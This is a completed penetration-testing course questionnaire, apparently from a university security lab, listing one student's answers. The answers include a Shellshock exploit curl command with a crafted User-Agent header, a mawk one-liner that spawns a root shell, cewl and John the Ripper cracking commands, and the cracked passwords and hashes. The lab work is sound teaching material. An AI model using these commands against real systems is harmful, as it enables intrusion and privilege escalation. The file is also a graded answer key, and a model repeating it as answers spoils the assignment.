Assignment Questionnaire
========================
NOTE: DO NOT DELETE --> and <--, and place your answers within the marks.
  Example:
    IP Address: 192.168.1.1
    -->
      IP Address: 130.207.7.210
    <--
DO NOT MODIFY THIS LINE OR THE LINES ABOVE

Do not mark up this file other than entering your answers between the arrows.
Use your README.txt for taking notes and keeping track of your work.
Thank you for your cooperation.

Info -- BE SURE TO FILL IN YOUR GT LOGIN ID HERE, in lower case.
====

Example:
  Your GT Login ID: gburdell3
  Your Name: George Burdell

-->
  Your GT Login ID: mhuang366
  Your Name: Minying Huang
<--

Task 1
=======

1. What is the IP address of the vulnerable Docker container on the Docker network?

Example:
  IP : 172.17.0.1
-->
  IP : 172.22.0.10
<--


2. On which Apache2 port can you reach the /cgi-bin/shellshock.cgi script?

Example:
  Port : 9999

-->
  Port : 8088
<--

3. On which port is the Python web server running?

Example:
  Port : 9998

-->
  Port : 8000
<--


Task 2
=======

1. What command did you use to exploit the shellshock vulnerability?

Example:
  Command : curl http://10.0.2.1:6262/cgi-bin/shellshock.cgi

-->
  Command : curl -X GET http://172.22.0.10:8088/cgi-bin/shellshock.cgi -H "User-Agent: () { test;};echo; /usr/bin/task2 mhuang366"
<--


2. What hash value is returned by running ./bin/task2 with your student ID.

-->
  Hash : f7b6e16c47108233a082db3413960b7b13e35670d658655f6d5bd1c98439e136
<--


Task 3
=======

1. Give the full name of the exploit module you used in Step 2.

Example:
  Module : auxiliary/scanner/portscan/tcp

-->
  Module : auxiliary/scanner/ssh/ssh_login
<--


2. Give the port number you used in Step 8:

Example:
  PortNumber : 4242

-->
  PortNumber : 9280
<--


3. What hash value is returned by running ./usr/bin/task3 with your student ID.

-->
  Hash : 52d59b16643d595430f99d4bb50b39c4e06f010df7a284c24d3be2be44badb29
<--


Task 4
=======

1. What command did you use to spawn a root shell.
NOTE: system is not an acceptable answer, that's not the command you're looking for.

Example:
  Command : system "/bin/sh"

-->
  Command : /usr/bin/mawk 'BEGIN {system("/bin/sh")}'
<--


2. What hash value is returned by running ./bin/task4 with your student ID.

-->
  Hash : c25353838da4821c7ac67ac28aeb38751d6091647adcde08e233382ddd8168e3
<--


Task 5
=======

1. Give the command you used to run cewl in step 4 in the "Cracking Task 5.2.gpg" section.

Example:
  Command : cewl with parameters
-->
  Command : cewl  http://172.22.0.10:8088/cgi-bin/shellshock.cgi -d 20 -w wordlist_new.txt
<--


2. What is the command you used to run John the Ripper in step 5 in the "Cracking Task 5.2.gpg" section.

Example:
  Command : command with parameters

-->
  Command : john --wordlist=/home/penteststudent/wordlist_new.txt task52.hash
<--


3. What is the password for task51.zip.
-->
  Password : rt76y
<--


4. What is the password for task52.gpg.

Example:
  Password : Avi@ti0n
-->
  Password : Neuroscience9
<--


5. Give the hash from running the task51 executable.

-->
  Hash : 838d543485295bd8730aaee142275872c4f575dabec47872d637ff27dabf7245
<--


6. Give the hash from running the task52 executable.

-->
  Hash : 50cce008f4b5a853980c3f482a1a1748328f7a9547c7abc0d3cb2bf321563445
<--

Task 6
=======

There is nothing to report here for Task 6, please use your README.txt for notes.
